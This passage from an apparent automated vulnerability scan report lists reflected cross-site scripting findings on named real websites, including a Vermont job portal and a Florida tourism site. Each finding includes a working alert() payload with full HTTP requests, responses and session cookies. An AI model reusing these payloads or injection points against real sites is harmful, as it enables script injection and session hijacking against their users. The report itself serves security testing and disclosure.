Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:09'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="usvuserid_error" value="478b6"style="x:expression(alert(1))"8a8c443b318" class="cfTransparent" />
...[SNIP]...

3.153. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [usvuserid_ADAdefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the usvuserid_ADAdefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d82c2"style%3d"x%3aexpression(alert(1))"c7cc97eb8fb was submitted in the usvuserid_ADAdefault parameter. This input was echoed as d82c2"style="x:expression(alert(1))"c7cc97eb8fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 283

usvuserid=&usvuserid_ADAdefault=d82c2"style%3d"x%3aexpression(alert(1))"c7cc97eb8fb&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&U_name=yes&choice=2&cftextboxext
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:13 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:13'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="usvuserid_adadefault_error" value="d82c2"style="x:expression(alert(1))"c7cc97eb8fb" class="cfTransparent" />
...[SNIP]...

3.154. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm [type parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_quicksearch_dsp.cfm

Issue detail

The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5572d"><a>89daaddf139 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ada/mn_quicksearch_dsp.cfm?type=e5572d"><a>89daaddf139&choice=1 HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:13:57 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="/ada/mn_quicksearch_dsp.cfm?rand=493049&amp;type=e5572d"><a>89daaddf139&amp;choice=2">
...[SNIP]...

3.155. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [reg%5Ftype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_registration_dsp.cfm

Issue detail

The value of the reg%5Ftype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f47a3"style%3d"x%3aexpression(alert(1))"fb321437520 was submitted in the reg%5Ftype parameter. This input was echoed as f47a3"style="x:expression(alert(1))"fb321437520 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /ada/mn_registration_dsp.cfm?reg%5Ftype=emf47a3"style%3d"x%3aexpression(alert(1))"fb321437520 HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:23 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Expires: {ts '2011-04-29 17:14:23'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="regType" value="emf47a3"style="x:expression(alert(1))"fb321437520" class="cfTransparent" />
...[SNIP]...

3.156. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [def parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_warn_dsp.cfm

Issue detail

The value of the def request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ef0e"style%3d"x%3aexpression(alert(1))"f93f40cde7a was submitted in the def parameter. This input was echoed as 9ef0e"style="x:expression(alert(1))"f93f40cde7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /ada/mn_warn_dsp.cfm?def=false9ef0e"style%3d"x%3aexpression(alert(1))"f93f40cde7a HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:26 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="DEF_prev" value="false9ef0e"style="x:expression(alert(1))"f93f40cde7a" />
...[SNIP]...

3.157. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [FormID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/services/schools/schsearch.cfm

Issue detail

The value of the FormID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ec4e"style%3d"x%3aexpression(alert(1))"d56a86a0e45 was submitted in the FormID parameter. This input was echoed as 8ec4e"style="x:expression(alert(1))"d56a86a0e45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /ada/services/schools/schsearch.cfm?securitysys=on&FormID=48ec4e"style%3d"x%3aexpression(alert(1))"d56a86a0e45&rand=461636 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:32:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="FORMID_prev" value="48ec4e"style="x:expression(alert(1))"d56a86a0e45" />
...[SNIP]...

3.158. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [rand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/services/schools/schsearch.cfm

Issue detail

The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d686"style%3d"x%3aexpression(alert(1))"e87098b543f was submitted in the rand parameter. This input was echoed as 3d686"style="x:expression(alert(1))"e87098b543f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /ada/services/schools/schsearch.cfm?securitysys=on&FormID=4&rand=4616363d686"style%3d"x%3aexpression(alert(1))"e87098b543f HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:34:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="RAND_prev" value="4616363d686"style="x:expression(alert(1))"e87098b543f" />
...[SNIP]...

3.159. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [securitysys parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/services/schools/schsearch.cfm

Issue detail

The value of the securitysys request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f014"style%3d"x%3aexpression(alert(1))"bc3565a5b08 was submitted in the securitysys parameter. This input was echoed as 3f014"style="x:expression(alert(1))"bc3565a5b08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /ada/services/schools/schsearch.cfm?securitysys=on3f014"style%3d"x%3aexpression(alert(1))"bc3565a5b08&FormID=4&rand=461636 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:30:46 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="SECURITYSYS_prev" value="on3f014"style="x:expression(alert(1))"bc3565a5b08" />
...[SNIP]...

3.160. http://www.visitflorida.com/facebook_logged_in.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /facebook_logged_in.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88952"-alert(1)-"319b7ec6502 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook_logged_in.php88952"-alert(1)-"319b7ec6502 HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 162341


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
+ sajax_target_id);
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/facebook_logged_in.php88952"-alert(1)-"319b7ec6502";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escape(sajax_
...[SNIP]...

3.161. http://www.visitflorida.com/facebook_logged_in.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /facebook_logged_in.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7b3e'-alert(1)-'bdf8821e492 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook_logged_in.phpe7b3e'-alert(1)-'bdf8821e492 HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
